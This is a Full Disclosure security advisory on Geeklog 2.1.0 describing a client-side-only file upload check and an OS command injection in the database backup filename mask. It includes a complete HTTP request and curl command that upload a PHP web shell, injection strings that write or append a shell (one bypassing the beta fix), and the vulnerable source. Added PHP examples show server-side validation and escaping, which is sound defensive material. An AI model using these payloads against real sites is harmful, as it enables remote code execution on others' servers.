Date: Mon, 07 Dec 2015 18:14:08 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Geeklog 2.1.0: Code Execution

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Geeklog 2.1.0
Fixed in:            2.1.1b3
Fixed Version Link:  https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact:      geeklog-security@...ts.geeklog.net
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:        Coordinated release
CVE:                 requested, but not assigned
Credits:             Tim Coen of Curesec GmbH

2. Overview

The admin area of Geeklog suffers from two vulnerabilities that can lead to
code execution: OS Command Injection and Upload of Files with Dangerous Type.

The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,
the OS command injection in version 2.1.1b3.

3. Upload of Files with Dangerous Type

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a file, the file type check is performed only client-side. An
attacker can easily bypass this check and thus upload files of dangerous types,
such as PHP files.

To upload files, an attacker needs a registered user that is in the group
"Filemanager Admin".

Proof of Concept


POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773
Cookie: [cookies]

-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="mode"

add
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"

/var/www/geeklog-2.1.0/public_html/images/
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="filepath"

test.png
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png

<?php passthru($_GET['x'])
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="upload"

Upload
-----------------------------10717364298700964751730232773--

As curl command:


curl -i -s -k  -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \
-b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \
--data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \
'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'
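
A server-side check of the kind whose absence is described above, as an added example (not Geeklog's or the file manager's code, and not the vendor's fix). The function name, the allowlist and the sample uploads are assumptions constructed for illustration; PHP's fileinfo extension is required.

```php
<?php
// Added example: server-side upload validation. Not Geeklog code.
// validateUpload() and ALLOWED_UPLOADS are hypothetical names.

const ALLOWED_UPLOADS = [
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'gif' => 'image/gif',
];

function validateUpload(string $clientName, string $tmpPath): string
{
    // Decide on the extension the server would store, never on the
    // client-supplied Content-Type header.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_UPLOADS)) {
        throw new RuntimeException("extension not allowed: '$ext'");
    }
    // Sniff the actual bytes and require them to match the extension.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected !== ALLOWED_UPLOADS[$ext]) {
        throw new RuntimeException("content type '$detected' does not match .$ext");
    }
    // Store under a server-generated name so the client controls no part of it.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample uploads: [client file name, file content].
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$samples = [
    ['shell.php', "<?php echo 'constructed test content';"],
    ['shell.png', "<?php echo 'constructed test content';"],
    ['logo.png',  $png],
];

foreach ($samples as [$name, $content]) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $content);
    try {
        echo "$name: accepted as " . validateUpload($name, $tmp) . "\n";
    } catch (RuntimeException $e) {
        echo "$name: rejected (" . $e->getMessage() . ")\n";
    } finally {
        unlink($tmp);
    }
}
```

Only the third sample is accepted: the first fails the extension allowlist and the second fails the content check, regardless of any Content-Type the client sends.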

4. OS Command Injection

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When performing a database backup, various settings are passed unsanitized to
exec, leading to code execution.

To exploit this issue, an attacker needs a registered user that is in the group
"Root".

Proof of Concept


1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
    geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"
2. Perform database backup here:
    http://localhost/geeklog-2.1.0/public_html/admin/database.php
    The injected commands will be executed.

In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command
injection is still possible, including the creation of a PHP shell by appending
the injected PHP code to an existing PHP file without closing tags:


    geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"

Code


/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
    $filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
    exec($command);
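
A hardened way to build the same kind of command, as an added example (not Geeklog code and not the fix shipped in 2.1.1b3). buildBackupCommand(), its parameters and the sample values are hypothetical; the quoting shown is that of escapeshellarg() on a POSIX shell.

```php
<?php
// Added example: hardened construction of the dump command. Not Geeklog code.
// buildBackupCommand() and its parameters are hypothetical.

function buildBackupCommand(string $dumpBin, string $dbName, string $backupDir, string $fileName): string
{
    // 1. Allowlist the expanded file name: letters, digits, dot, underscore
    //    and hyphen only, ending in .sql. Quotes, semicolons, slashes and
    //    redirection characters never reach the shell.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,128}\.sql\z/', $fileName)) {
        throw new InvalidArgumentException('backup file name has unexpected characters');
    }
    // 2. Quote every value with escapeshellarg() rather than wrapping it
    //    in hand-written double quotes.
    $target = rtrim($backupDir, '/') . '/' . $fileName;
    return escapeshellarg($dumpBin) . ' ' . escapeshellarg($dbName)
         . ' > ' . escapeshellarg($target);
}

// Constructed inputs: an expanded benign mask, and one whose embedded
// double quote would close the quoted redirect target in dobackup().
$names = [
    'geeklog_db_backup_2015_12_07_18_14_08.sql',
    'backup.sql";id;"',
];

foreach ($names as $name) {
    try {
        echo buildBackupCommand('/usr/bin/mysqldump', 'geeklog', '/var/backups', $name), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The same allowlist check belongs where the configuration value is saved, so that a bad mask is refused before any backup runs.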

5. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
